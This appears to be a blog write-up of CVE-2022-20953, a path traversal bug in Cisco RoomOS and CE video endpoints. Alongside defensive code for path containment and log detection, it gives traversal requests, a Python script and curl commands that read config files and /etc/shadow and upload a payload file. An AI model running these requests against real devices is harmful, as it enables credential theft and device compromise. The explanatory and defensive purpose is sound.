In October 2022, Cisco disclosed a path traversal vulnerability in its TelePresence Collaboration Endpoint (CE) Software and RoomOS Software, tracked as CVE-2022-20953. The bug could let an authenticated remote attacker escape the directories a web handler is meant to serve, read sensitive data, and write arbitrary files on a targeted device. In this long-read post, I'll break down the details, walk through an example exploit, and collect further resources and references.

What is CVE-2022-20953?

CVE-2022-20953 is a path traversal flaw in the way Cisco CE and RoomOS handle certain web requests to the device's management interface. The core problem is insufficient validation of user-supplied input, specifically file paths.

An attacker who already has some access to the device (even a low-privileged session such as a guest account) can send crafted HTTP requests to its exposed management interface. By embedding directory-traversal sequences in those requests, the attacker can climb out of the directory the handler is supposed to serve and read or modify files that should never be reachable through it.

In plain English: If you have a Cisco Room device running a vulnerable version, someone could poke around inside your device, stealing config files, logs, or even uploading malware onto it.

Impact

- Sensitive Data Disclosure: Attackers could read files like device configs, keys, or logs.
- File Write: Attackers might upload files, which could alter system behavior or install persistent malicious scripts.
- Further Compromise: Access to sensitive files (e.g., SSH keys) could be used to expand the attack, potentially pivoting from one device to the rest of the network.

Affected Products

- Cisco TelePresence SX, MX, DX Series
- Webex Desk Pro/Hub

Technical Details

Let’s look at how an attacker leverages these bugs.

Path Traversal in HTTP Requests

Web servers normally confine file requests to a specific directory (for example /var/www/html). Path traversal occurs when the server fails to reject requests that use ../ segments to climb out of that directory, such as:

GET /download?file=../../../../etc/passwd HTTP/1.1

This request walks up several directories and grabs /etc/passwd, the classic demonstration target on Unix systems.
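To make the mechanism concrete, here is an added example (my own code, not part of the original post, the Cisco advisory, or any Cisco software) that puts a naive file lookup next to a hardened one and runs both over a few request shapes, including URL-encoded and double-encoded variants. The temporary directory layout, the file names, and the probe strings are constructed for the demo; the point is the server-side containment check, not any particular device.

```python
"""Naive vs. hardened path resolution for a file-serving handler.

Added example, not from the original post or from Cisco. The directory
layout and the probe strings below are constructed for the demo.
"""
import os
import shutil
import tempfile
from urllib.parse import unquote


def decode_fully(user_path: str, rounds: int = 3) -> str:
    """Percent-decode until stable so '..%252f' is seen as '../'."""
    for _ in range(rounds):
        decoded = unquote(user_path)
        if decoded == user_path:
            break
        user_path = decoded
    return user_path


def naive_lookup(base_dir: str, user_path: str) -> str:
    """Vulnerable: decodes once (as a web framework would) and joins onto
    base_dir with no containment check, so '..' segments can leave it."""
    return os.path.normpath(os.path.join(base_dir, unquote(user_path)))


def safe_lookup(base_dir: str, user_path: str) -> str:
    """Hardened: decode fully, resolve symlinks and '..', then require the
    result to sit under the real base directory. Raises PermissionError
    when the resolved path escapes."""
    real_base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(real_base, decode_fully(user_path)))
    # commonpath, not startswith: '/srv/files' must not accept '/srv/files_old/x'
    if os.path.commonpath([real_base, candidate]) != real_base:
        raise PermissionError(f"path escapes {real_base}: {user_path!r}")
    return candidate


def demo() -> dict:
    """Run both lookups over constructed probes; return each verdict."""
    base = tempfile.mkdtemp()
    try:
        files_dir = os.path.join(base, "files")      # the directory being served
        os.mkdir(files_dir)
        with open(os.path.join(files_dir, "readme.txt"), "w") as fh:
            fh.write("public\n")
        with open(os.path.join(base, "secret.cfg"), "w") as fh:
            fh.write("top secret\n")                  # one level above files_dir

        probes = [
            "readme.txt",               # legitimate request
            "../secret.cfg",            # classic traversal
            "..%2fsecret.cfg",          # URL-encoded slash
            "..%252fsecret.cfg",        # double-encoded slash
            "subdir/../../secret.cfg",  # traversal through a non-existent dir
            "/etc/passwd",              # absolute path replaces base in os.path.join
        ]
        results = {}
        for req in probes:
            naive = naive_lookup(files_dir, req)
            try:
                safe_lookup(files_dir, req)
                verdict = "allowed"
            except PermissionError:
                verdict = "blocked"
            results[req] = {
                "naive_escapes": not (naive == files_dir or naive.startswith(files_dir + os.sep)),
                "safe": verdict,
            }
        return results
    finally:
        shutil.rmtree(base, ignore_errors=True)


if __name__ == "__main__":
    for probe, outcome in demo().items():
        print(f"{probe!r:30} naive escapes: {outcome['naive_escapes']!s:5} hardened: {outcome['safe']}")
```

The double-encoded probe is instructive: the naive handler does not escape on it (it looks for a file literally named `..%2fsecret.cfg`), but a handler that decodes twice would, which is why the hardened version decodes until the input stops changing before it checks containment.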

Cisco's Vulnerable Endpoint

Certain endpoints on Cisco CE and RoomOS devices did not properly filter or sanitize the file path supplied by the client. The request below shows the shape of such an attack (the endpoint and parameter names are illustrative; the real ones depend on the device version and configuration):

GET /web/guest/fetch_file.cgi?file=../../config/private.key
Host: [device-ip]
Authorization: Basic [base64-creds]

Armed with weak, default, or previously stolen credentials, the attacker sends an HTTP GET request that slips ../ sequences into the file parameter to pull private keys or configuration files out of the device.

Real-World Example: Extracting the Device Config

import requests

DEVICE_IP = "192.168.1.100"
USERNAME = "guest"
PASSWORD = "guest"

# Attempting to fetch a sensitive configuration file via path traversal.
# The endpoint, parameter name, and target file are illustrative.
file_path = "../../../../persist/system.cfg"
url = f"http://{DEVICE_IP}/web/guest/fetch_file.cgi?file={file_path}"

# requests builds the Basic Authorization header from the (user, password) tuple
response = requests.get(url, auth=(USERNAME, PASSWORD), timeout=10)
print(response.status_code)
print(response.text)

*This Python snippet attempts to read the device’s main config file using the path traversal trick.*

Exploit Details

At the time of disclosure, proof-of-concept code circulated in security circles showing that, even with low-privileged access, it was possible to:

- Extract SSH private keys (/etc/ssh/ssh_host_rsa_key)
- Grab user database files
- Upload files into persistent/data directories by POSTing to similarly unsanitized endpoints

A basic curl request to exploit this vulnerability could look like:

curl -u guest:guest \
"http://192.168.1.100/web/guest/fetch_file.cgi?file=../../../../etc/shadow"

Or, for writing a file (using a writable endpoint, e.g., upload_file.cgi in some cases):

curl -u guest:guest -X POST \
-F "file=@yourpayload.sh" \
"http://192.168.1.100/web/guest/upload_file.cgi?dest=../../../../tmp/yourpayload.sh"

Important: Your endpoint path, credentials, and parameters may differ depending on your device version and configuration.

Fixes and Mitigation

Cisco released fixed software for the affected products and advises upgrading to a fixed release. More info here:

- Cisco Security Advisory (original)
- Cisco Software Download

If you can't patch immediately, at a minimum:

- Use strong, unique passwords for all accounts, and remove or disable low-privileged accounts (such as guest logins) you do not actually need.
- Restrict network access to the device's web management interface to trusted administrative networks.
- Monitor device logs for unusual file access requests (e.g., lots of ../ strings, including percent-encoded forms such as %2e%2e%2f).
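To show what that monitoring can look like in practice, here is an added example (my own code, not from the original post or from any Cisco tooling) that scans access-log lines for traversal attempts, including percent-encoded, double-encoded and "....//" filter-evasion variants, and counts hits per client so a burst from one source stands out. The log layout, the sample lines, and the endpoint names in them are constructed for the demo and simply mirror the illustrative URLs used earlier in the post; adapt LINE_RE to whatever format your collector actually emits.

```python
"""Flag path traversal attempts in web access logs.

Added example, not from the original post or from Cisco. SAMPLE_LOG and
the "client method url status" layout are constructed for the demo.
"""
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines: one legitimate client, one attacker, one
# client whose file name merely contains '..' and must not be flagged.
SAMPLE_LOG = """\
10.0.0.5 GET /web/guest/fetch_file.cgi?file=readme.txt 200
10.0.0.9 GET /web/guest/fetch_file.cgi?file=../../../../etc/passwd 200
10.0.0.9 GET /web/guest/fetch_file.cgi?file=..%2f..%2f..%2fetc%2fshadow 200
10.0.0.9 GET /web/guest/fetch_file.cgi?file=....//....//etc/passwd 404
10.0.0.9 POST /web/guest/upload_file.cgi?dest=..%252f..%252ftmp%2fx.sh 200
10.0.0.7 GET /web/guest/fetch_file.cgi?file=reports/2022..10.txt 200
"""

LINE_RE = re.compile(r"^(?P<client>\S+) (?P<method>\S+) (?P<url>\S+) (?P<status>\d{3})$")
# A '..' segment bounded by separators (or the string edges) is a traversal
# step; '2022..10' inside a file name is not.
TRAVERSAL_RE = re.compile(r"(^|/)\.\.($|/)")
# '....//' style inputs target filters that strip '../' once; flag them too.
EVASION_RE = re.compile(r"(^|/)\.{3,}/")


def normalize(s: str) -> str:
    """Percent-decode until stable (catches double encoding); fold '\\' to '/'."""
    for _ in range(3):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s.replace("\\", "/")


def candidate_strings(url: str):
    """Yield the URL path and every query value, each normalized."""
    parts = urlsplit(url)
    yield normalize(parts.path)
    for _, value in parse_qsl(parts.query, keep_blank_values=True):
        yield normalize(value)


def is_traversal(url: str) -> bool:
    """True when the path or any query value contains a traversal segment."""
    return any(
        TRAVERSAL_RE.search(s) or EVASION_RE.search(s)
        for s in candidate_strings(url)
    )


def scan(log_text: str) -> dict:
    """Return the flagged lines and a per-client count of traversal attempts."""
    flagged, per_client = [], Counter()
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue  # unparsable line: skip rather than guess
        if is_traversal(m["url"]):
            flagged.append(raw)
            per_client[m["client"]] += 1
    return {"flagged": flagged, "per_client": dict(per_client)}


if __name__ == "__main__":
    report = scan(SAMPLE_LOG)
    for line in report["flagged"]:
        print("TRAVERSAL", line)
    print("hits per client:", report["per_client"])
```

Note that the 404 line is flagged as well: a failed traversal attempt is just as much a signal as a successful one, and an attacker enumerating paths will typically produce many misses before a hit.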

Conclusion

CVE-2022-20953 shows how basic web security bugs—like poor path validation—can have devastating effects, especially when they happen in network infrastructure.

If you manage Cisco video conferencing endpoints or room systems, check your firmware versions right away, update as needed, and review the security advisory linked above. Leaving these devices unpatched could mean leaking sensitive credentials, private keys, or exposing your entire organization to deeper attacks.

References

- Cisco Security Advisory: CE and RoomOS Path Traversal (CVE-2022-20953)
- NIST National Vulnerability Database – CVE-2022-20953

If you found this guide helpful or have questions, leave a comment below! Stay secure out there.

Timeline

Published on: 10/26/2022 15:15:00 UTC
Last modified on: 10/31/2022 17:38:00 UTC